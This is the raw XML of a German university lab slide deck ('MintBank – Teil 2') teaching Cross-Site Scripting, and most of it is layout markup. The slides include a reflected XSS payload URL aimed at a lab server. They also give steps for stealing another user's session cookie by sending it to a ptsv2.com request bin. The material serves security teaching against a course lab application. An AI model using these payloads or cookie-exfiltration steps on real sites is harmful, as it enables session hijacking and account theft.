    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7562559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B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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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5E1F1654-B7AB-49C5-8BE4-326B1B94A0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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24947378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TB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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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F682C394-5EF2-490B-8106-0BBC549309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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23753218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TW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00" y="1771650"/>
            <a:ext cx="4597400" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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8F899730-BE1F-46EC-B9A0-398E774EC8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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173544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-/Schlussfolie Campus Urste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C44F2EE5-CE7F-4593-8CAD-E8078A1E4E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4" y="1527345"/>
            <a:ext cx="5400675" cy="271904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598" y="1771650"/>
            <a:ext cx="4597401" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:no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" y="2701528"/>
            <a:ext cx="4597399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de-AT" dirty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B7790845-DD05-47CE-95C4-F61D53D4220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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)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1B2625C-79AA-4DD8-9922-FD4AF7958CEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5424183" y="447675"/>
            <a:ext cx="905483" cy="4435476"/>
            <a:chOff x="5424183" y="447675"/>
            <a:chExt cx="905483" cy="4435476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C12EBE4C-E0AD-4335-879F-F138A46487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63907" y="4387903"/>
              <a:ext cx="812714" cy="495248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61D025B5-A5A5-49A1-B272-B654A59511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24183" y="447675"/>
              <a:ext cx="905483" cy="813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23310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T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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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7E97493-B531-4358-819D-B71C1D50D3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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27076420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SP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00" y="1771650"/>
            <a:ext cx="4597400" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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415E80E3-5A0A-4659-ABD5-2060C6B04D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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42946152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TS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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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E6F97EC7-102F-41B0-8F33-3DB6E20C22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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22485567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MU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00" y="1771650"/>
            <a:ext cx="4597400" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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D6D1DA30-ED20-4719-BE0D-2E7FB6FE1C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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="952056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MA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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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A55B50DC-30EB-4216-8DC3-C793BA0EBC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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19304939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MT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106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00" y="1771650"/>
            <a:ext cx="4597400" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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383022AC-0988-40A9-9D6A-AEC56F9D03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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1537360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TK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00" y="1771650"/>
            <a:ext cx="4597400" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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797CD05A-9957-47CF-87FB-E86F0848E3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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14512474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TH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4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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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797CD05A-9957-47CF-87FB-E86F0848E3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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14912137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AT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4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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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797CD05A-9957-47CF-87FB-E86F0848E3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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11027217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B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4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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597399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797CD05A-9957-47CF-87FB-E86F0848E3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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224629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-/Schlussfolie Campus Kuchl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BE141672-6861-415A-991B-047E33499A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5" y="1527346"/>
            <a:ext cx="5400676" cy="271904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00" y="1771650"/>
            <a:ext cx="4597400" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:no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" y="2701528"/>
            <a:ext cx="4597399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de-AT" dirty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EEAADEA8-10A1-4B06-B8E6-F9C8BA1E9C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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)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450636E-A77C-4235-86DB-C0255DFFF315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5424183" y="447675"/>
            <a:ext cx="905483" cy="4435476"/>
            <a:chOff x="5424183" y="447675"/>
            <a:chExt cx="905483" cy="4435476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3FDACBC6-AA6E-42D5-9984-6E5FD0A5D2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63907" y="4387903"/>
              <a:ext cx="812714" cy="495248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AFF3A8E3-C385-4A4E-B89B-BD395927C8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24183" y="447675"/>
              <a:ext cx="905483" cy="813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41941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C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4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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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797CD05A-9957-47CF-87FB-E86F0848E3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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19182285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ZA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1" y="447674"/>
            <a:ext cx="1594002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00" y="1771650"/>
            <a:ext cx="4597399" cy="860822"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="24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" y="2701528"/>
            <a:ext cx="4597400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797CD05A-9957-47CF-87FB-E86F0848E3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 noProof="0" dirty="0"/>
              <a:t>Platzhalter für Copyright (nur auf Schlussfolie)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100478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CC736-C343-4042-B5B2-731703167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1282305"/>
            <a:ext cx="6464300" cy="1350167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DCB93D-318A-45C3-8194-DDE8366E6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600" y="2709665"/>
            <a:ext cx="6464300" cy="696476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5D056F7C-ED23-4533-9A14-AAD9B8315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251-AC05-408B-8D6A-D08A9B57A344}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT" dirty="0"/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2F5ADF56-030A-4C93-8AE6-2BA59031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DC75D510-D956-4292-A897-7931AE7D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4130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n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AF221-57D3-4A56-BA74-8EA148F1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403F3D-3A08-434E-A95D-62B04BDF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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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E412A1-1A2C-46EA-ADB7-1B2CCD73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0BD04C-41A7-4007-9DE0-DCDC5451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CF1C6A4-DABF-4715-8EE9-C35B37CAD9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600" y="1527175"/>
            <a:ext cx="6461548" cy="30241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2306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387C4412-BC86-4328-9CE7-6534E42DFD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6600" y="1520894"/>
            <a:ext cx="4978400" cy="30241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2AF221-57D3-4A56-BA74-8EA148F1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403F3D-3A08-434E-A95D-62B04BDF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EE8E-E45B-4B9D-B1F6-54DC56462905}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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E412A1-1A2C-46EA-ADB7-1B2CCD73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0BD04C-41A7-4007-9DE0-DCDC5451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6F23870-1C97-46CC-B44B-E70B19B893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38850" y="1527175"/>
            <a:ext cx="2114550" cy="30241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3653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e mit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DF059A-1941-4A7D-BF88-85CA6C4F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F0EB77-7794-476F-A789-046E31D5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7119-485F-4303-8687-3E523663B2F0}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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863198-3C17-40C2-B753-55A97E98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DB8466-B94C-4E9B-B815-550F62A0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F4789065-741B-4EC2-A140-ABFAF37AC5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6600" y="1520894"/>
            <a:ext cx="4978400" cy="14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1A3D3140-D15D-4F15-B188-A7A96B16AD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38850" y="1527176"/>
            <a:ext cx="2114550" cy="1440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7" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{381D330A-3676-46BD-867C-3782B51816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6600" y="3115426"/>
            <a:ext cx="4978400" cy="14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86DC60E8-8AB3-4B6E-9107-6ABBD969C40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38850" y="3121708"/>
            <a:ext cx="2114550" cy="1440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150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größ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CC49B7C-293D-47F6-ABD9-362F882D64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6600" y="1527175"/>
            <a:ext cx="3003550" cy="3024186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AT"/>
              <a:t>Formatvorlagen des Textmasters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2AF221-57D3-4A56-BA74-8EA148F1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403F3D-3A08-434E-A95D-62B04BDF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2D54-5DCF-45BD-A6A8-F63BD8AA7EEC}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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E412A1-1A2C-46EA-ADB7-1B2CCD73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0BD04C-41A7-4007-9DE0-DCDC5451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6F23870-1C97-46CC-B44B-E70B19B893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89400" y="1527175"/>
            <a:ext cx="4064000" cy="30241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0162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17C5A7-4347-4014-9D47-CB4608DB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460980"/>
            <a:ext cx="6752060" cy="60362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689F7C-4182-47B8-BD42-A40F0C18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7980" y="1527175"/>
            <a:ext cx="6460168" cy="3028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AT"/>
              <a:t>Formatvorlagen des Textmasters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7C340-2F41-41B2-8762-CA0A51DE1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6600" y="4851400"/>
            <a:ext cx="638175" cy="10557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038404FC-5D45-44B5-BE8B-19AC5F313CAA}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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2AF78E-4449-4A86-83E5-D4455C3D5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85938" y="4851400"/>
            <a:ext cx="4329112" cy="10557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EE357D-7DDC-4AB4-9413-94A13EF00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37488" y="4851400"/>
            <a:ext cx="315912" cy="10557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53469B5-C180-4227-8051-48377B8E3CF1}" type="slidenum">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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81E819D-714F-4721-A610-5C8F08CF82B5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996" y="526977"/>
            <a:ext cx="537867" cy="53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2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62" r:id="rId6"/>
    <p:sldLayoutId id="2147483663" r:id="rId7"/>
    <p:sldLayoutId id="2147483674" r:id="rId8"/>
    <p:sldLayoutId id="2147483664" r:id="rId9"/>
    <p:sldLayoutId id="2147483665" r:id="rId10"/>
    <p:sldLayoutId id="2147483676" r:id="rId11"/>
    <p:sldLayoutId id="2147483652" r:id="rId12"/>
    <p:sldLayoutId id="2147483653" r:id="rId13"/>
    <p:sldLayoutId id="2147483671" r:id="rId14"/>
    <p:sldLayoutId id="2147483672" r:id="rId15"/>
    <p:sldLayoutId id="2147483673" r:id="rId16"/>
    <p:sldLayoutId id="2147483675" r:id="rId17"/>
    <p:sldLayoutId id="2147483666" r:id="rId18"/>
    <p:sldLayoutId id="2147483654" r:id="rId19"/>
    <p:sldLayoutId id="2147483655" r:id="rId20"/>
  </p:sldLayoutIdLst>
  <p:hf hd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6858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88000" indent="-14400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14400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00" indent="-14400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4400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81" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="962" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="5136" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="464" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="4536" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" orient="horz" pos="2867" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="667" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="282" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" orient="horz" pos="3052" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" pos="530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17C5A7-4347-4014-9D47-CB4608DB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460980"/>
            <a:ext cx="6752060" cy="60362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689F7C-4182-47B8-BD42-A40F0C18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7980" y="1527175"/>
            <a:ext cx="6460168" cy="3028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AT"/>
              <a:t>Formatvorlagen des Textmasters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7C340-2F41-41B2-8762-CA0A51DE1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6600" y="4851400"/>
            <a:ext cx="638175" cy="10557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BE80F87-52B6-4304-92FD-9EC271560256}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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2AF78E-4449-4A86-83E5-D4455C3D5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85938" y="4851400"/>
            <a:ext cx="4329112" cy="10557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EE357D-7DDC-4AB4-9413-94A13EF00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37488" y="4851400"/>
            <a:ext cx="315912" cy="10557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53469B5-C180-4227-8051-48377B8E3CF1}" type="slidenum">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:pPr/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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81E819D-714F-4721-A610-5C8F08CF82B5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996" y="526977"/>
            <a:ext cx="537867" cy="53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8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</p:sldLayoutIdLst>
  <p:hf hd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6858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88000" indent="-14400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14400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00" indent="-14400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4400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81">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="962">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" pos="5136">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" pos="464">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="10" pos="4536">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="11" orient="horz" pos="2867">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="12" orient="horz" pos="667">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="13" orient="horz" pos="282">
          <p15:clr>
            <a:srgbClr val="F26B43"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="14" orient="horz" pos="3052">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="15" pos="530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tsv2.com/t/ll80z-133769420/post?session=foobar" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ptsv2.com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HTTP-Statuscode" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://api.jquery.com/jquery.get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en/function.fwrite.php" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.php.net/manual/en/reserved.variables.get.php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myfhs.fh-salzburg.ac.at/display/ITHDESK/Webspace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5.196.132.7/Admin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5.196.132.7/auth/Logout?returnUrl=https://fh-salzburg.ac.at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5.196.132.7:1080/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://5.196.132.7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5.196.132.7/PortalSearch?SearchString=%3Cscript%3Ealert%28%22XSS+Attack%21%22%29%3B%3C%2Fscript%3E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391308A0-1A28-4A4D-84AA-09BC5D677C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1F570A9-4787-4003-97BA-5041EFFB2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MINT-Lab Softwareentwicklung 4. Semester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50AB73C6-E4DA-4C92-85E8-C883E8D8A4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05: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>MintBank</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> – Teil 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="907122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5C7C2-5243-B656-6B44-D92498B98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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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2338CCB-795B-21F1-4509-9DD1A030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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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80685E-9E32-2E13-2692-77A2F147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144999-4EA9-29F6-D9C8-CA4A242F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10</a:t>
            </a:fld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B757EBB-31B2-25DB-DC4C-3E4C71F2FC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dirty="0"/>
              <a:t>Als nächstes möchten wir die Session eines anderen Users über einen XSS-Angriff stehlen. Dafür müssen wir auf die Cookies zugreifen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>Gib folgendes in der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>Console</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> ein: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Über diese Variable können wir auf unsere eigenen Cookies und somit auch auf die Session zugreifen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT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EF8DEF5-3676-6117-2E96-8C2300C44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32" y="2932460"/>
            <a:ext cx="5144218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4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5C7C2-5243-B656-6B44-D92498B98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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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2338CCB-795B-21F1-4509-9DD1A030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407D-193E-4BAB-AE77-9606647CE952}" type="datetime1">
              <a:rPr lang="de-AT" smtClean="0"/>
              <a:t>09.06.2022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80685E-9E32-2E13-2692-77A2F147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144999-4EA9-29F6-D9C8-CA4A242F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11</a:t>
            </a:fld>
            <a:endParaRPr lang="de-AT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07A30D1-85F3-9855-3EA3-2B39987962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600" y="1296931"/>
            <a:ext cx="6461548" cy="3024188"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Um die Session eines anderen Users zu stehlen, müssen wir die Cookies irgendwie abfangen. Dafür gibt es einige Möglichkeiten.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>Zuerst die einfache Möglichkeit:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>Erstelle eine neue Toilette: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ptsv2.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="486900" lvl="1" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>An diese Toilette können wir nun Daten senden, entweder mit POST- oder GET-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>Requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>. Probiere Daten mittels GET zu senden, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0" err="1"/>
              <a:t>z.B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ptsv2.com/t/ll80z-133769420/post?session=foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1600" dirty="0"/>
              <a:t> (verwende Deine Toiletten ID!)</a:t>
            </a:r>
          </a:p>
          <a:p>
